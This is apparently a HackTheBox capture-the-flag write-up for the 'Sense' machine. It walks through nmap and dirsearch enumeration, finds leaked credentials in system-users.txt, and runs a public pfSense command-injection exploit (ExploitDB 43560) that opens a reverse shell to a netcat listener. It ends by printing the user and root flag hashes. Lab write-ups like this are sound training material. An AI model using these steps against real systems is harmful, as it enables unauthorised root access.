HackTheBox Sense
Writeup for HackTheBox Sense
Machine Synopsis
Sense, while not requiring many steps to complete, can be challenging for some as the proof of concept exploit that is publicly available is very unreliable. An alternate method using the same vulnerability is required to successfully gain access. (Source)
Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
$ nmap -sC -sV -A 10.10.10.60
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_http-server-header: lighttpd/1.4.35
443/tcp open ssl/http lighttpd 1.4.35
|_http-title: Login
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after: 2023-04-06T19:21:35
|_http-server-header: lighttpd/1.4.35
|_ssl-date: TLS randomness does not represent time
It seems like there is a website, let’s check it out!
Trying the default credentials admin:pfsense did not work :(
Let’s run a dirsearch then!
Note: was stuck here for awhile because the important file was hidden in a
txtfile
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ dirsearch -u https://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -f -e txt, php
...
[21:00:28] Starting:
[21:00:29] 301 - 0B - /themes -> https://10.10.10.60/themes/
[21:00:32] 301 - 0B - /css -> https://10.10.10.60/css/
[21:00:32] 301 - 0B - /includes -> https://10.10.10.60/includes/
[21:00:35] 301 - 0B - /javascript -> https://10.10.10.60/javascript/
[21:00:37] 200 - 271B - /changelog.txt
[21:00:38] 301 - 0B - /classes -> https://10.10.10.60/classes/
[21:00:41] 301 - 0B - /widgets -> https://10.10.10.60/widgets/
[21:00:54] 200 - 7KB - /tree/
[21:00:54] 301 - 0B - /tree -> https://10.10.10.60/tree/
[21:01:10] 301 - 0B - /shortcuts -> https://10.10.10.60/shortcuts/
[21:01:27] 301 - 0B - /installer -> https://10.10.10.60/installer/
[21:01:27] 302 - 0B - /installer/ -> installer.php
[21:01:37] 301 - 0B - /wizards -> https://10.10.10.60/wizards/
[21:09:19] 301 - 0B - /csrf -> https://10.10.10.60/csrf/
[21:18:25] 200 - 106B - /system-users.txt
[21:21:06] 301 - 0B - /filebrowser -> https://10.10.10.60/filebrowser/
...
It seems like there were some interesting txt files called changelog.txt and system-users.txt!
It seems to say that there are 2 of 3 vulnerabilities that were patched.
We got some credentials to work on! Let’s try logging in!
Note: it turns out the credentials were actually
rohit:pfsenseinstead ofRohit:company defaults
The most important information here is probably the version number, so let’s do some research :D
Exploitation
After some Google searches, I found that the version has a command injection vulnerability listed on ExploitDB.
Let’s grab the script using searchsploit, start a netcat listener and exploit!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ searchsploit -m 43560
$ python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.3 --lport 1234 --username rohit --password pfsense
CSRF token obtained
Running exploit...
Exploit completed
$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.60] 16918
sh: can't access tty; job control turned off
# whoami
root
# cat /home/rohit/user.txt
8721327cc232073b40d27d9c17e7348b
# cat /root/root.txt
d08c32a5d4f8c8b10e76eb51a69f1a86